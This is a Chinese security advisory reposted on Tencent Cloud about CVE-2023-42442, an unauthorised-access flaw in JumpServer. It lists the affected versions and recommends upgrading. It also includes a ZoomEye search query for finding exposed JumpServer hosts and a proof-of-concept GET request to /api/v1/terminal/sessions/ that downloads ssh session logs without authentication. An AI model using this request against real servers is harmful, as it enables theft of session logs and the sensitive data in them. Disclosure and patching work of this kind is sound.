前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2023-42442:JumpServer未授权访问漏洞

CVE-2023-42442:JumpServer未授权访问漏洞

作者头像
Timeline Sec
发布2023-09-29 15:39:27
9180
发布2023-09-29 15:39:27
举报
文章被收录于专栏:Timeline SecTimeline Sec

0x01 简介

JumpServer开源堡垒机是一款运维安全审计系统产品,提供身份验证、授权控制、账号管理、安全审计等功能支持,帮助企业快速构建运维安全审计能力。JumpServer开源堡垒机通过企业版或者软硬件一体机的方式,向企业级用户交付开源增值的运维安全审计解决方案。

0x02 漏洞概述

漏洞编号:CVE-2023-42442

该漏洞存在于JumpServer中,是一个未授权访问漏洞。api/api/v1/terminal/sessions/权限控制存在逻辑错误,可以被攻击者匿名访问。未经身份验证的远程攻击者可利用该漏洞下载ssh日志,并可借此远程窃取敏感信息。存储在 S3、OSS 或其他云存储中的ssh会话不受影响。

0x03 影响版本

3.0.0 <= JumpServer <= 3.5.4

3.6.0 <= JumpServer <= 3.6.3

0x04 环境搭建

使用ZoomEye网络空间搜索引擎

zoomeye语法 app:"飞致云堡垒机"

0x05 漏洞复现

漏洞POC:

代码语言:javascript
复制
/api/v1/terminal/sessions/

配置请求包

tips:GET请求包要空两行

代码语言:javascript
复制
GET /api/v1/terminal/sessions/ HTTP/1.1
Host: 127.0.0.1


0x06 修复方式

目前官方已有更新版本,升级至最新版本

下载地址:https://www.jumpserver.org/

推荐服务

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2023-09-28 17:59,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x02 漏洞概述
  • 0x03 影响版本
  • 0x04 环境搭建
  • 0x05 漏洞复现
  • 0x06 修复方式
相关产品与服务
堡垒机
腾讯云堡垒机(Bastion Host,BH)可为您的 IT 资产提供代理访问以及智能操作审计服务,为客户构建一套完善的事前预防、事中监控、事后审计安全管理体系,助力企业顺利通过等保测评。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档